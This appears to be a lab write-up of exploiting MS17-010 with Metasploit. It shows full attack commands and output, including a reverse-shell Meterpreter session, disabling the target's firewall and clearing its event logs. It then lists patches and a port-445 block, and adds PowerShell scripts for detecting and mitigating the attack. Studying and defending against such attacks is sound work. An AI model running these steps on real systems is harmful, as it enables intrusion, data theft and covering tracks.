Breaking into a host from Kali using the MS17-010 vulnerability

Lab environment

Target: Windows Server 2008 R2 with port 445 open (Windows Firewall does not need to be turned off).
Attacker: Kali, using the Meterpreter penetration tool; vulnerability: MS17-010 EternalBlue.

Procedure

1) First use Nmap to scan whether port 445 is open on the target.


2) Start msfconsole on Kali


3) Scan the target for the vulnerability


4) Attack the target with the MS17-010 vulnerability

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue		//switch to the exploit module
msf5 exploit(windows/smb/ms17_010_eternalblue) > 
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp		//use a reverse-connection payload so the target connects back to Kali
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > 
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.10.129	//target IP address
rhost => 192.168.10.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.128	//Kali IP address
lhost => 192.168.10.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 	//launch the attack

[*] Started reverse TCP handler on 192.168.10.128:4444 
[*] 192.168.10.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.129:445    - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.10.129:445    - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.10.129:445 - Connecting to target for exploitation.
[+] 192.168.10.129:445 - Connection established for exploitation.
[+] 192.168.10.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.129:445 - CORE raw buffer dump (46 bytes)
[*] 192.168.10.129:445 - 0x00000000  57 69 6e 64 6f 77 73 20 57 65 62 20 53 65 72 76  Windows Web Serv
[*] 192.168.10.129:445 - 0x00000010  65 72 20 32 30 30 38 20 52 32 20 37 36 30 31 20  er 2008 R2 7601 
[*] 192.168.10.129:445 - 0x00000020  53 65 72 76 69 63 65 20 50 61 63 6b 20 31        Service Pack 1  
[+] 192.168.10.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.129:445 - Starting non-paged pool grooming
[+] 192.168.10.129:445 - Sending SMBv2 buffers
[+] 192.168.10.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.129:445 - Sending final SMBv2 buffers.
[*] 192.168.10.129:445 - Sending last fragment of exploit packet!
[*] 192.168.10.129:445 - Receiving response from exploit packet
[+] 192.168.10.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.129:445 - Sending egg to corrupted connection.
[*] 192.168.10.129:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 192.168.10.129
[*] Meterpreter session 1 opened (192.168.10.128:4444 -> 192.168.10.129:49159) at 2020-11-27 12:06:37 +0800
[+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >	//the attack succeeded; the target can now be controlled

5) List the directories and files on the target's C: drive


6) Download files


7) Crack the user password

The hash can be cracked at www.cmd5.com.

8) Log in to the target via Remote Desktop

root@KALI:~# rdesktop -u administrator -p abc123 192.168.10.129:3389


9) Take a screenshot


10) Turn off the firewall

meterpreter > shell		//enter the target's command prompt
Process 2848 created.
Channel 4 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\>
C:\>netsh advfirewall set allprofiles state off		//turn off the target's firewall
netsh advfirewall set allprofiles state off
确定。

C:\>

11) Clear the event logs

Before clearing, all event log entries are visible on the target.
Clear the log entries from Kali.
Check on the target again: only one record remains, the one for clearing the log.
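Steps 10 and 11 (turning the firewall off from a shell, then wiping the logs) are exactly the actions a defender should alert on, and the post's own result in step 11 shows why: once the Security log is cleared, the event that recorded the firewall change disappears with it and only the "log cleared" record survives. The script below is an added example, not code from the original post; it queries the event IDs Microsoft documents for these actions. The script name and the lookback parameter are this example's own.

```powershell
# Find-TamperingEvents.ps1 (hypothetical name; added example, not from the post)
# Looks for the traces that steps 10 and 11 of the walkthrough leave in the
# Windows event logs:
#   Security 4950 - a Windows Firewall setting changed (profile state turned off)
#   Security 1102 - the audit (Security) log was cleared
#   System   104  - the System log was cleared
# Assumptions: run in an elevated PowerShell on the server, or on a collector
# holding its forwarded logs; 4950 is only written when the
# "MPSSVC Rule-Level Policy Change" audit subcategory is enabled.

param(
    [int]$LookbackHours = 24
)

$since = (Get-Date).AddHours(-$LookbackHours)

function Get-TamperingEvents {
    param([string]$LogName, [int[]]$Ids)
    # -FilterHashtable filters on the server side; SilentlyContinue swallows the
    # non-terminating "No events were found" error when nothing matches.
    Get-WinEvent -FilterHashtable @{
        LogName   = $LogName
        Id        = $Ids
        StartTime = $since
    } -ErrorAction SilentlyContinue
}

$labels = @{
    4950 = 'FIREWALL SETTING CHANGED'
    1102 = 'SECURITY LOG CLEARED'
    104  = 'SYSTEM LOG CLEARED'
}

# @(...) turns "no output" into an empty array so += adds nothing.
$hits = @()
$hits += @(Get-TamperingEvents -LogName 'Security' -Ids 4950, 1102)
$hits += @(Get-TamperingEvents -LogName 'System'   -Ids 104)

if ($hits.Count -eq 0) {
    Write-Output "No firewall-change or log-clear events in the last $LookbackHours hours."
    return
}

foreach ($e in ($hits | Sort-Object TimeCreated)) {
    # The first line of the message names the profile/setting (4950) or the
    # account that cleared the log (1102/104); enough for a triage summary.
    $firstLine = ($e.Message -split "`r?`n")[0]
    Write-Output ("{0}  {1,-25} {2}" -f $e.TimeCreated, $labels[$e.Id], $firstLine)
}
```

Run on the server after step 11 it will report only the 1102 and 104 records, which is the point: the 4950 from step 10 can only be recovered from a copy of the log forwarded to a collector before the clear.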

Defending against MS17-010

1) Install the patches

KB976932 (SP1), KB4012212, KB4012215

2) Use the advanced settings of the system firewall to block connections to port 445


msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.10.128:4444 
[*] 192.168.10.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.129:445    - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.10.129:445    - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.10.129:445 - Connecting to target for exploitation.
[+] 192.168.10.129:445 - Connection established for exploitation.
[+] 192.168.10.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.129:445 - CORE raw buffer dump (46 bytes)
[*] 192.168.10.129:445 - 0x00000000  57 69 6e 64 6f 77 73 20 57 65 62 20 53 65 72 76  Windows Web Serv
[*] 192.168.10.129:445 - 0x00000010  65 72 20 32 30 30 38 20 52 32 20 37 36 30 31 20  er 2008 R2 7601 
[*] 192.168.10.129:445 - 0x00000020  53 65 72 76 69 63 65 20 50 61 63 6b 20 31        Service Pack 1  
[+] 192.168.10.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.129:445 - Starting non-paged pool grooming
[+] 192.168.10.129:445 - Sending SMBv2 buffers
[+] 192.168.10.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.129:445 - Sending final SMBv2 buffers.
[*] 192.168.10.129:445 - Sending last fragment of exploit packet!
[*] 192.168.10.129:445 - Receiving response from exploit packet
[+] 192.168.10.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.129:445 - Sending egg to corrupted connection.
[*] 192.168.10.129:445 - Triggering free of corrupted buffer.
[-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
msf5 exploit(windows/smb/ms17_010_eternalblue) > 

As you can see, the connection fails!!!
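A script that checks both countermeasures above on the server itself, as an added example that is not from the original post: it reports whether the KBs the post lists are installed, adds an inbound TCP 445 block rule with netsh if none is present, and as an extra read-only check reports whether SMBv1 has been disabled. The script name, the rule name and the SMBv1 check are this example's own additions.

```powershell
# Check-Ms17010Mitigations.ps1 (hypothetical name; added example, not from the post)
# Verifies the two mitigations the post lists for a Windows Server 2008 R2 host
# and adds the port-445 block rule if it is missing.
# Assumptions: run in an elevated PowerShell on the server. The KB numbers are
# the ones the post names: KB976932 is SP1 (prerequisite), KB4012212 is the
# March 2017 security-only update and KB4012215 the March 2017 monthly rollup;
# either of the last two contains the MS17-010 fix. The rule name is made up.

$RuleName = 'MS17-010-Block-Inbound-TCP445'

# 1) Patch state. Get-HotFix reads the same data as "wmic qfe list".
$installed = Get-HotFix | Select-Object -ExpandProperty HotFixID
$hasSp1 = $installed -contains 'KB976932'
$hasFix = ($installed -contains 'KB4012212') -or ($installed -contains 'KB4012215')

Write-Output ("SP1 (KB976932) installed : {0}" -f $hasSp1)
Write-Output ("MS17-010 fix installed    : {0}" -f $hasFix)
if (-not $hasFix) {
    # Caveat: later monthly rollups supersede KB4012215 under their own KB
    # numbers, so a missing ID means "check the rollup level", not
    # "definitely vulnerable". The smb_ms17_010 check module is the direct test.
    Write-Warning 'Neither KB4012212 nor KB4012215 is listed; confirm the installed rollup level.'
}

# 2) Firewall. netsh advfirewall is what works on 2008 R2 (the NetSecurity
# cmdlets such as New-NetFirewallRule only arrived with Server 2012).
netsh advfirewall show allprofiles state

netsh advfirewall firewall show rule name=$RuleName | Out-Null
if ($LASTEXITCODE -ne 0) {
    # No matching rule (netsh exits non-zero): block inbound TCP 445 on every profile.
    netsh advfirewall firewall add rule name=$RuleName dir=in action=block protocol=TCP localport=445 profile=any
} else {
    Write-Output "Rule already present: $RuleName"
}

# 3) Read-only extra (beyond the post's two steps): has SMBv1 been disabled on
# the server side? Microsoft's documented switch for 2008 R2 is the SMB1 DWORD
# under the LanmanServer parameters key (0 = disabled; absent = enabled).
$params = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$smb1 = (Get-ItemProperty -Path $params -ErrorAction SilentlyContinue).SMB1
if ($smb1 -eq 0) {
    Write-Output 'SMBv1 server : disabled'
} else {
    Write-Output 'SMBv1 server : enabled (value absent or non-zero)'
}
```

The block rule is a stop-gap until the patch is installed; the re-run of the exploit shown above, ending in FAIL, is the confirmation that the rule is effective, and the same re-run after patching should end at the check stage instead of reporting the host as likely vulnerable.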
